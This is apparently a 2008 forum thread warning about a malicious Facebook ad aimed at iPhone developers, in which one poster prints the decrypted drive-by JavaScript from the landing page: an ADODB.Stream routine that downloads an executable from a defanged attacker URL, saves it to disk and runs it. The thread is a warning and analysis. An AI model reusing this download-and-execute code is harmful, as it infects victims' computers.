Facebook Trojan

Status
Not open for further replies.

TheDean

Aug 3, 2008
okay some dumb mother fucker just put up an ad on facebook that spreads a trojan.

DO NOT CLICK the following ad if you see it.

trojanadw.jpg


trojanscreenshot.jpg


and the mother fucker redirects to takerealty.com. I see the source is ea.widlil.net/handler/allpack.html.
 


His ad sucks for someone trying to spread something like that to the masses. Unless he's purposely targeting iPhone app developers. Even so, pretty slick. Respek for creativity! But when FB nabs him, if he's using his real CC he's gonna be fucked.
 
he was definitely not aiming at the masses with this one. I mean, like you said, the copy couldn't be more perfect to bring in the dev crowd. No way he's using his own CC. As the economy tanks even more I wonder just how much of this we'll see. If it gets crazy, I'm sure verification policies for new advertisers will go into place. No more of this sign up and run it.

man facebook will approve a trojan but not some flog landers..... this is an outrage.

well, they are all on Macs...
 
Speaking of Kaspersky, anybody else having it continually shut itself down starting tonight? It's not Conficker, but their latest update fucked something up.
 
that ad is pretty weird. You need Mac OS X to develop iPhone apps, and that trojan is only for Windows, right?
 
Macs can get trojans. It got through Internal Facebook and they all use Macs. And it's targeting iPhone App developers, ergo they use Macs as well. So the puzzle is coming together. Deliver a trojan that quietly infects Macs, and start fucking data mining internal Facebook and whoever else clicks.

Kaspersky is pretty robust, the Russians don't fuck around when it comes to virus software apparently. All I have to do is sneeze and this fucker goes on lock down.
 
I've seen a Mac trojan attempt to infect one of my machines. Without any bullshit antivirus software installed, it will still open an OS X Installer that requires your admin privileges and for you to type your login info in.

There are certainly no secret files being inserted into your machine. It takes a full-on "yes please let me get infected" for you to actually acquire the trojan.

They must have just cloaked the fb interns.
 
I just visited the page and it's a big-ass JavaScript that's encrypted. I just did a quick decrypt and here is where the magic happens. Def a virus for PC yet targeting Mac users. Note the file it attempts to download. I XX'd out the url just in case.

Code:
function VdAQqREvJk() {
	try{
		// Where the downloaded payload gets dropped on the victim's C: drive
		var downloadPath = 'c:\\fBrKWbU.exe';
		// ADODB.Stream is the ActiveX object old IE drive-bys use to write raw bytes to disk
		var obj = XExpCore.getTargetObj('ADODB.Stream');
		// XExpCore is the helper defined elsewhere in the obfuscated script; bail unless it also has a shell and XMLHTTP object
		if( obj && XExpCore.Shell != null && XExpCore.XmlHttp != null ) {
			// Fetch the executable (URL defanged by the poster)
			var contentBinary = XExpCore.httpDownload( 'hXXp://ea.widlil.net/download/CADB64A9/160B9C0FE915BF66ED51FC993DF50835/48D2F110-0C0C-433d-AA87-15BBFBD59129' );
			if( contentBinary != null ) {
				obj.Type = 1; obj.Mode = 3; // Type 1 = binary stream, Mode 3 = read/write
				obj.Open(); obj.Write( contentBinary );
				obj.SaveToFile( downloadPath, 2); // 2 = overwrite an existing file
				obj.Close();
				// Run the dropped file; any error on the way is swallowed by the catch below
				return XExpCore.shellExecute( downloadPath );
			}
		}
	}catch(e) {}
	return false;
}
 

+1

I've never owned a Mac so really don't know its defenses, thus my stealth comment. So would this get blocked like any other trojan?
 
Well, you're totally right, a trojan can exist. But yeah, it cannot magically just install itself like some exploits on older Windows OSes can. Instead it will launch the Mac equivalent of an InstallShield which asks for your user name and password to authenticate to root privs (Mac ~= Unix). Then it will install like normal.

If you're not a very savvy computer user there's a good chance you'll just type it in without thinking and then sure, it will install.

Of course iPhone devs are gonna know better since they're more savvy. So the only thing I can think is this was just a really shitty translated Russian trojan ad intended for a different user base.
 